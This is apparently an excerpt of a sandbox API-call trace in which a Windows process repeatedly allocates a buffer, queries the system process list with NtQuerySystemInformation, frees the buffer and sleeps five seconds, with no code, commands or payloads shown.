0x0 [0148.264] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0148.266] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0148.267] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0148.278] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0148.279] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0148.279] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0148.279] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0148.280] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0148.282] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0148.282] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0148.294] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0148.294] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0148.295] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0148.295] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0148.296] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0148.298] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0148.298] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0148.310] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0148.310] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0148.310] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0148.311] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0148.311] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0148.313] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0148.313] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0148.325] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0148.325] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0148.326] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0148.326] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0148.326] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0148.329] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0148.329] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0148.342] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0148.343] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0148.343] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0148.344] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0148.344] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0148.346] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0148.346] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0148.356] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0148.357] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0148.357] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0148.357] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0148.358] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0148.359] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0148.360] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0148.372] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0148.373] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0148.373] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0148.374] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0148.374] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0148.377] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0148.378] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0148.387] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0148.388] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0148.388] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0148.388] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0148.389] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0148.390] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0148.391] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0148.403] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0148.403] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0148.404] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0148.404] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0148.405] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0148.407] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0148.408] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0148.419] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0148.419] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0148.420] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0148.420] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0148.420] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0148.422] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0148.423] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0148.435] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0148.436] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0148.436] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0148.437] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0148.437] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0148.439] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0148.440] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0148.451] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0148.451] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0148.452] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0148.452] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0148.452] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0148.454] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0148.454] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0148.466] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0148.466] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0148.467] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0148.467] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0148.467] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0148.470] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0148.470] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0148.481] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0148.481] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0148.482] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0148.482] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0148.482] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0148.484] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0148.485] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0148.497] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0148.497] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0148.498] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0148.498] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0148.499] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0148.501] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0148.502] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0148.512] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0148.513] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0148.513] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0148.513] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0148.514] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0148.515] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0148.516] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0148.528] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0148.528] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0148.529] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0148.529] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0148.529] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0148.531] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0148.532] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0148.543] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0148.544] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0148.544] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0148.545] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0148.545] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0148.547] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0148.547] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0148.561] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0148.562] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0148.563] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0148.563] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0148.564] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0148.567] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0148.568] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0148.577] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0148.577] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0148.577] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0148.578] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0148.578] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0148.580] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0148.581] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0148.590] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0148.591] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0148.591] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0148.591] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0148.592] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0148.593] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0148.594] 